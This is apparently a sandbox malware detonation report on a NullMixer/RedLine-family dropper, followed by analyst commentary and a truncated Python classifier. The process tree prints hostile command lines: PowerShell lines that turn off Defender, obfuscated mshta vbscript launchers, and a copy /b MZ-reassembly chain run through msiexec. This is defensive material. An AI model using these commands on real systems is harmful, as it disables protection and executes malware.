memory/1408-279-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2560-284-0x0000000002DA0000-0x0000000002EFC000-memory.dmp
memory/2560-283-0x0000000002AD0000-0x0000000002C2C000-memory.dmp
memory/2844-292-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2844-300-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2844-290-0x0000000000400000-0x0000000000422000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
79s
Max time network
153s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1776 set thread context of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe |
| PID 2172 set thread context of 4868 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe |
| PID 4216 set thread context of 1608 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
Wed09ed6b36e57df5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
Wed0900caa0501dc98f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1948 -ip 1948
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
Wed0944361c3621a67a6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
Wed090db89ca4c58.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe
Wed0983917533e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe
Wed09d761ab4704dd931.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe
Wed09c4c0c3d01.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe
Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe
Wed09f69eef9c0d5b.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2232 -ip 2232
C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$602B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 356
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$90058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed090db89ca4c58.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
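Three techniques sit in the command lines above that a responder should be able to pull out of a process tree mechanically: the Defender tampering through Set-MpPreference / Add-MpPreference (real-time monitoring off, cloud reporting off, the Temp drop directory excluded), the case-mangled mshta vbscript: one-liners that copy a payload to a new name, start it and taskkill the original, and the reassembly of a PE from the extension-less RarSFX1 fragments listed under Files. That last one works because echo | set /p writes its prompt with no trailing newline, so the stub file holds only the two bytes MZ; copy /y /b then concatenates the stub and the remaining fragments in order, Del /Q * removes the parts, and msiexec /y loads the result by calling DllRegisterServer on it, so _enU.W is a DLL executed under a Microsoft-signed binary. No fragment on disk ever starts with MZ, which is what the split is for. The following is an added example and not part of the sandbox report: a Python classifier run over a constructed subset of the command lines quoted above, plus an emulation of the copy /b step on invented fragment bytes. The fragment contents are made up (the report records only names and hashes), and the two-byte MZ content of PUVMYbL.81 is assumed from the set /p command, not verified against the hash.

```python
import re
from typing import Dict, List, Optional

# Command lines copied from the process tree above (a constructed subset of the report).
SAMPLE_CMDLINES = [
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
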